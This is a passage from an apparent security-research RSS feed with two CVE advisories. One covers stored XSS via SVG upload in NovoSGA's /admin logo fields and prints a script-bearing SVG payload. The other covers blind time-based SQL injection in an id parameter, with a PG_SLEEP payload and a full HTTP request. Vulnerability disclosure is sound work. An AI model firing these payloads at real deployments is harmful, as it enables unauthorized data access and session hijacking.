&amp;lt;/h2&amp;gt;&amp;lt;p align=&amp;#34;justify&amp;#34;&amp;gt;Multiples Stored Cross-Site Scripting (XSS) via SVG File Upload Bypass vulnerability was identified in the &amp;lt;code&amp;gt;/admin&amp;lt;/code&amp;gt; endpoint of the NovoSGA application. This vulnerability allows attackers to upload malicious files into the &amp;lt;code&amp;gt;logoNavbar&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;logoLogin&amp;lt;/code&amp;gt; parameters. The injected files are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-10909-multiples-stored-cross-site-scripting-xss-injection-via-svg-file-upload-bypass&amp;#34;&amp;gt;CVE-2025-10909: Multiples Stored Cross-Site Scripting (XSS) Injection via SVG File Upload Bypass
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10909&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10909&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p align=&amp;#34;justify&amp;#34;&amp;gt;Multiples Stored Cross-Site Scripting (XSS) via SVG File Upload Bypass vulnerability was identified in the &amp;lt;code&amp;gt;/admin&amp;lt;/code&amp;gt; endpoint of the NovoSGA application. This vulnerability allows attackers to upload malicious files into the &amp;lt;code&amp;gt;logoNavbar&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;logoLogin&amp;lt;/code&amp;gt; parameters. The injected files are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/admin&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameters: &amp;lt;code&amp;gt;logoNavbar&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;logoLogin&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p align=&amp;#34;justify&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;logoNavbar&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;logoLogin&amp;lt;/code&amp;gt; parameters. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p align=&amp;#34;justify&amp;#34;&amp;gt;Save the payload in the &amp;lt;code&amp;gt;xss.svg&amp;lt;/code&amp;gt; file.&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;5
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;svg&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;xmlns&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;http:&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;//&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;www&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;w3&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;org&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;2000&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;svg&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;#34;&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;fill&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;none&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;    &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;This&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;is&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;an&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;XSS&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;POC&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;from&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;CVEHUNTERS&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;);&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;svg&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10909/image.png&amp;#34;
	width=&amp;#34;565&amp;#34;
	height=&amp;#34;262&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10909/image_hu_b57344f147506082.png 480w, /p/cve-2025-10909/image_hu_5d0c054a6a8a9ef0.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;215&amp;#34;
		data-flex-basis=&amp;#34;517px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10909/image-1.png&amp;#34;
	width=&amp;#34;547&amp;#34;
	height=&amp;#34;248&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10909/image-1_hu_5e49e8aee02acf5b.png 480w, /p/cve-2025-10909/image-1_hu_26dd0b39f6a28a56.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;220&amp;#34;
		data-flex-basis=&amp;#34;529px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/NovoSGA/CVE-2025-10909.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/NovoSGA/CVE-2025-10909.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 24 Sep 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-10844</title>
        <link>https://www.cvehunters.com/p/cve-2025-10844/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-10844/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-10844-sql-injection-blind-time-based-vulnerability-in-id-parameter-on-modulecadastroaluno-endpoint&amp;#34;&amp;gt;CVE-2025-10844: SQL Injection (Blind Time-Based) Vulnerability in &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; Parameter on &amp;lt;code&amp;gt;module/Cadastro/aluno&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10844&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10844&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was discovered in the &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; parameter of the &amp;lt;code&amp;gt;module/Cadastro/aluno&amp;lt;/code&amp;gt; endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly sanitize user-supplied input in the &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-10844-sql-injection-blind-time-based-vulnerability-in-id-parameter-on-modulecadastroaluno-endpoint&amp;#34;&amp;gt;CVE-2025-10844: SQL Injection (Blind Time-Based) Vulnerability in &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; Parameter on &amp;lt;code&amp;gt;module/Cadastro/aluno&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10844&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10844&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was discovered in the &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; parameter of the &amp;lt;code&amp;gt;module/Cadastro/aluno&amp;lt;/code&amp;gt; endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly sanitize user-supplied input in the &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;module/Cadastro/aluno&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;#39; AND 9581=(SELECT 9581 FROM PG_SLEEP(5)) AND &amp;amp;#39;bffB&amp;amp;#39;=&amp;amp;#39;bffB
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h4 id=&amp;#34;example-request&amp;#34;&amp;gt;Example Request
&amp;lt;/h4&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;15
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;16
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;17
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;18
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;19
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;GET /module/Cadastro/aluno?id=208%27%20AND%209581=(SELECT%209581%20FROM%20PG_SLEEP(5))%20AND%20%27bffB%27=%27bffB HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: localhost:8086
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;sec-ch-ua: &amp;amp;#34;Not)A;Brand&amp;amp;#34;;v=&amp;amp;#34;8&amp;amp;#34;, &amp;amp;#34;Chromium&amp;amp;#34;;v=&amp;amp;#34;138&amp;amp;#34;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;sec-ch-ua-mobile: ?0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;sec-ch-ua-platform: &amp;amp;#34;Linux&amp;amp;#34;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: pt-BR,pt;q=0.9
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Upgrade-Insecure-Requests: 1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko)
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Chrome/138.0.0.0 Safari/537.36
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept:
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;text/html,application/xhtml&#43;xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;q=0.8,application/signed-exchange;v=b3;q=0.7
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: none
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: navigate
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-User: ?1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: document
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: i_educar_session=bnTu3HZ4Jk5a0JxRERNMd03ZAr1TUGvXZTDs9DdE
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
